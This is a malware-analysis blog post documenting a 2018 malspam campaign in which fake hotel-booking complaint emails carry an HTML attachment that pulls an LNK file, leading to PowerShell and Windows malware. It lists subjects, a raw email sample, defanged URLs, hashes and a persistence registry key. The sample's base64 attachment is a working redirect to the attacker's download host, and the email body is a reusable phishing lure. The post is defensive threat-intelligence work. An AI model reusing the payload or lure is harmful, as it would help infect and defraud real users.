2018-08-21 - MALSPAM USING HTML ATTACHMENTS --> LNK FILES FOR WINDOWS INFECTIONS

NOTICE:

• The zip archives on this page have been updated, and they now use the new password scheme.  For the new password, see the "about" page of this website.

ASSOCIATED FILES:

• 2018-08-21-malspam-4-email-examples.zip   5.1 kB (5,058 bytes)
• 2018-08-21-traffic-from-infected-windows-host.pcap.zip   3.1 MB (3,131,119 bytes)
• 2018-08-21-malware-from-infected-Windows-host.zip   3.5 MB (3,466,996 bytes)

NOTES:

• On 2018-08-21, I ran across several emails sent from 85.244.107[.]244 with an HTML attachment designed to downlowd an LNK file to infect a vulnerable Windows computer.

• Malspam --> HTML attachment --> stat44.lnk --> wget1.ps1 --> malware EXE files from e-bookstore.eu

 

WEB TRAFFIC BLOCK LIST

Indicators are not a block list.  If you feel the need to block web traffic, I suggest the following URL and domain:

• hxxp[:]//185.206.146[.]58/test/stat44.lnk
• e-bookstore[.]eu

 

EMAILS

MALSPAM EXAMPLES FROM 2018-08-21:

• From: "Frank Gardner" -- Subject: I need to make a complaint about booking no 101948738098145. -- 16:34 UTC
• From: "Jaden Ford" -- Subject: I need to make a complaint about booking number 438758969306946. -- 16:33 UTC
• From: "Trenton Gibson" -- Subject: I need to make a complaint about booking number 866460740566254. -- 16:30 UTC
• From: "Travis Oliver" -- Subject: I need to make a complaint about booking no 544022500514984. -- 16:26 UTC
• From: "Joseph Crawford" -- Subject: I need to make a complaint about booking number 110881477594376. -- 16:19 UTC
• From: "Payton Reyes" -- Subject: I need to make a complaint about booking number 607234060764313. -- 16:19 UTC
• From: "Ayden Smith" -- Subject: I need to make a complaint about booking number 171948105096817. -- 16:18 UTC
• From: "Wesley Sims" -- Subject: I need to make a complaint about booking number 706645905971527. -- 16:17 UTC
• From: "Kaden Patterson" -- Subject: I need to make a complaint about booking no 210028886795044. -- 16:16 UTC
• From: "Benjamin Payne" -- Subject: I need to make a complaint about booking number 488654673099518. -- 16:15 UTC
• From: "Benjamin Burton" -- Subject: I need to make a complaint about booking no 860649943351746. -- 16:15 UTC
• From: "Andres Morris" -- Subject: I need to make a complaint about booking number 484156996011734. -- 16:06 UTC
• From: "Justin Mitchell" -- Subject: I need to make a complaint about booking number 869276106357574. -- 15:58 UTC
• From: "Gavin Morrison" -- Subject: I need to make a complaint about booking number 444489479064941. -- 14:23 UTC
• From: "Julio Jenkins" -- Subject: I need to make a complaint about booking number 978492200374603. -- 13:32 UTC
• From: "Jose Kennedy" -- Subject: I need to make a complaint about booking number 143197759985924. -- 13:27 UTC
• From: "Gregory Hudson" -- Subject: I need to make a complaint about booking number 325913161039352. -- 13:25 UTC
• From: "Gerardo Elliott" -- Subject: I need to make a complaint about booking number 436533272266388. -- 13:23 UTC

• NOTE: according to the email headers, all of these emails were Received: from ([85.244.107.244])

 

MALSPAM SAMPLE:

Received: from ([85.244.107[.]244]) by [removed] for [removed];
        Tue, 21 Aug 2018 13:23:25 +0000 (UTC)
From: "Gerardo Elliott" <marchdor@[recipient's email domain]>
Subject: I need to make a complaint about booking number 436533272266388.
To: [removed]
Content-Type: multipart/mixed; boundary="1d7RDSqWTrvjr7FCc=_Sx0i4OkaQJgenMW"
MIME-Version: 1.0
Date: Tue, 21 Aug 2018 14:23:28 +0100
Priority: urgent
X-Priority: 1

This is a multi-part message in MIME format

--1d7RDSqWTrvjr7FCc=_Sx0i4OkaQJgenMW
Content-Type: text/html; charset="ISO-8859-1"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

<!DOCTYPE html>
<html>
<head>Good afternoon, my name is Gerardo Elliott
</head>
<body>
        I have a complaint to be made on the days between 4/14/2018 to 4/16/2018 stay at Arizona Inn was all paid in cash, but I left my final card 4785 Visa for additional expenses in which it was not necessary , today I received the invoice and there is a debit in the amount of 420 dollars on behalf of Arizona Inn I would like immediate refund, because my invoice and direct debit and has already been paid.
I await the return of your part in attachment sending the proof of debit with the statement of undue debit.
        </body>
</html>

--1d7RDSqWTrvjr7FCc=_Sx0i4OkaQJgenMW
Content-Type: application/octet-stream;
        name="statement.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
        filename="statement.html"

DQoNCg0KPG1ldGEgaHR0cC1lcXVpdj0icmVmcmVzaCIgY29udGVudD0iMDsgdXJsPWh0dHA6Ly8x
ODUuMjA2LjE0Ni41OC90ZXN0L3N0YXQ0NC5sbmsiPg0K

--1d7RDSqWTrvjr7FCc=_Sx0i4OkaQJgenMW--

 

TRAFFIC

TRAFFIC FROM AN INFECTED WINDOWS HOST:

• hxxp[:]//185.206.146[.]58/test/stat44.lnk
• hxxps[:]//e-bookstore[.]eu/teste/wget1.ps1
• hxxps[:]//e-bookstore[.]eu/teste/total.png
• hxxps[:]//e-bookstore[.]eu/teste/atual.mp3
• hxxps[:]//e-bookstore[.]eu/musc/mulk.mp3

 

MALWARE

MALWARE FROM AN INFECTED WINDOWS HOST:

• SHA256 hash: 377f9b24eb08db328342a9b008153c6cd20cc580989d5bea35150749a17be369
  File size: 90 bytes
  File name: statement.html
  File description: attachment from the malspam

• SHA256 hash: 45280cf654999d5d4a186b95aabc74d2241e0d99d3225dcbfd4e9e2dc8004865
  File size: 951 bytes
  File name: stat44.lnk
  File location: LNK file downloaded from above file statement.html

• SHA256 hash: 8e9f46fb46f96707d30370e764861ca0d96585021eb9df4326c9cb8be3e080bb
  File size: 14,848 bytes
  File location: hxxps[:]//e-bookstore[.]eu/teste/total.png
  File location: C:\Users\Public\origin.exe

• SHA256 hash: 13cd9132bc902884677e10515ce97098162a3e3ef681656986648591019c0a39
  File size: 2,123,776 bytes
  File location: hxxps[:]//e-bookstore[.]eu/teste/atual.mp3
  File location: C:\Users\Public\aatray.exe

• SHA256 hash: 0998ec2f4e8f3802aef8cb4a8eea481abc555487aa2c2846bdd19182ff65878f
  File size: 931,328 bytes
  File location: hxxp[:]//e-bookstore[.]eu/musc/mulk.mp3
  File location: C:\Users\Public\audioth.exe

• SHA256 hash: 6af71b55eadd5d6c6040686596a0959cd96e584678f2c1931c38916b31660e7c
  File size: 1,700,864 bytes
  File location: C:\Users\Public\atasino.exe

• SHA256 hash: ba75172040b58614f35bb039bf4089533af93812752fd020c078fbec8dc853f4
  File size: 841,728 bytes
  File location: C:\Users\Public\curt.dll

• SHA256 hash: d578b8266f7e56a460dc8cb83c73f38da04be580fdb72acea2ef3fe8659ec965
  File size: 848,896 bytes
  File location: C:\Users\Public\pwb.dll

 

WINDOWS REGSITRY UPDATE FROM THE INFECTED WINDOWS HOST:

• Registry key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  Value name: audioth
  Value type: REG_SZ
  Value data: C:\Users\Public\audioth.exe

 

IMAGES

Shown above:  Screenshot from one of the emails.

 

Shown above:  Traffic from an infection filtered in Wireshark.

 

Shown above:  Traffic from an infection shown in the Fiddler web debugger.

 

Shown above:  Spript wget1.ps1 returned from e-bookstore.eu.

 

Shown above:  Malware persistent on an infected Windows host.

 

Click here to return to the main page.